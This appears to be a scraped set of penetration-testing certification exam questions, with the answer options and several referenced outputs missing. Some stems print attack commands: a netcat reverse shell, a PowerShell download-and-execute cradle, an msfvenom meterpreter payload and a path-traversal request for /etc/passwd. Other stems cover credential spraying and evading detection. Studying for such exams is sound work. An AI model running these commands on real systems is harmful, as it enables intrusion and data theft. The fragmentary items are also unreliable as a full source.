A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives’ accounts that are in the scope of work. Which of the following should the tester do to get access to these accounts?
A penetration tester writes the following script to enumerate a 1724 network:
1 #!/bin/bash
2 for i in {1..254}; do
3 ping -c1 192.168.1.$i
4 done
The tester executes the script, but it fails with the following error:
-bash: syntax error near unexpected token `ping'
Which of the following should the tester do to fix the error?
During a penetration test, a tester captures information about an SPN account. Which of the following attacks requires this information as a prerequisite to proceed?
A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:
Which of the following should the tester recommend in the report to best prevent this type of vulnerability?
Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?
While conducting an assessment, a penetration tester identifies the details for several unreleased products announced at a company-wide meeting. Which of the following attacks did the tester most likely use to discover this information?
A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?
A penetration tester completes a scan and sees the following Nmap output on a host:
Nmap scan report for victim (
Host is up (0.0001s latency)
161/udp open snmp
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Running Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7::sp0
The tester wants to obtain shell access. Which of the following related exploits should the tester try first?
A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?
Host | CVSS | EPSS
Target 1 | 4 | 0.6
Target 2 | 2 | 0.3
Target 3 | 1 | 0.6
Target 4 | 4.5 | 0.4
A penetration tester needs to complete cleanup activities from the testing lead. Which of the following should the tester do to validate that reverse shell payloads are no longer running?
While performing an internal assessment, a tester uses the following command:
crackmapexec smb -u user.txt -p Summer123@
Which of the following is the main purpose of the command?
During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an Active Directory (AD) local domain.
The tester’s main goal is to leverage credentials to authenticate into other systems within the Active Directory environment.
Which of the following steps should the tester take to complete the goal?
Which of the following is within the scope of proper handling and most crucial when working on a penetration testing report?
A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating stability. Which of the following commands should the tester try first?
A penetration tester is unable to identify the Wi-Fi SSID on a client’s cell phone.
Which of the following techniques would be most effective to troubleshoot this issue?
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:
nc -e /bin/sh 4444
Which of the following would most likely bypass the filtered space character?
During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?
dnscmd.exe /config /serverlevelplugindll C:\users\necad-TA\Documents\adduser.dll
Which of the following is the penetration tester trying to achieve?
A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?
A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.
Select the appropriate answer(s), given the output from each section.
Output 1
Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?
GET /foo/images/file?id=2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
Which of the following web application attacks is the tester performing?
A penetration tester needs to collect information over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?
A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:
Action | SRC
| --
Block | : 1-65535 | : 22 | TCP
Allow | : 1-65535 | | TCP
Allow | : 1-65535 | | TCP
Block | . | . | *
Which of the following commands should the tester try next?
curl -s -i https://internalapp/
HTTP/2 302
date: Thu, 11 Jan 2024 15:56:24 GMT
content-type: text/html; charset=iso-8659-1
location: /login
x-content-type-options: nosniff
server: Prod
Which of the following recommendations should the penetration tester include in the report?
A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client’s networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?
A penetration testing team needs to determine whether it is possible to disrupt wireless communications for PCs deployed in the client’s offices. Which of the following techniques should the penetration tester leverage?
While performing a penetration test, a tester executes the following command:
PS c:\tools> c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe
Which of the following best explains what the tester is trying to do?
A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?
A penetration tester attempts unauthorized entry to the company's server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?
A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities. Which of the following techniques should the tester use?
A penetration tester gains shell access to a Windows host. The tester needs to permanently turn off protections in order to install additional payload. Which of the following commands is most appropriate?
During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The tester receives the results and then executes the following command:
snmpwalk -v 2c -c public
Which of the following is the tester trying to do based on the command they used?
A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?
Which of the following techniques is the best way to avoid detection by Data Loss Prevention (DLP) tools?
During a penetration test, the tester gains full access to the application's source code. The application repository includes thousands of code files. Given that the assessment timeline is very short, which of the following approaches would allow the tester to identify hard-coded credentials most effectively?
A penetration tester is testing a power plant's network and needs to avoid disruption to the grid. Which of the following methods is most appropriate to identify vulnerabilities in the network?
During a penetration testing exercise, a team decides to use a watering hole strategy. Which of the following is the most effective approach for executing this attack?
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:
findstr /SIM /C:"pass" *.txt *.cfg *.xml
Which of the following is the penetration tester trying to enumerate?
A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?
Using the output, identify potential attack vectors that should be further investigated.
Given the following script:
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]
If ($1 -eq "administrator") {
echo IEX(New-Object Net.WebClient).Downloadstring(' ') | powershell -noprofile -}
Which of the following is the penetration tester most likely trying to do?
During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?
During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?
A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?
A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:
line 1: #!/usr/bin/bash
line 2: DOMAINS_LIST = "/path/to/list.txt"
line 3: while read -r i; do
line 4: nikto -h $i -o scan-$i.txt &
line 5: done
The script does not work as intended. Which of the following should the tester do to fix the script?
Which of the following is within the scope of proper handling and is most crucial when working on a penetration testing report?
A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.
Select the tool the penetration tester should use for further investigation.
Select the two entries in the robots.txt file that the penetration tester should recommend for removal.
During a red-team exercise, a penetration tester obtains an employee's access badge. The tester uses the badge's information to create a duplicate for unauthorized entry. Which of the following best describes this action?
A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:
Which of the following targets should the tester select next?
A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access. Which of the following techniques should the tester use?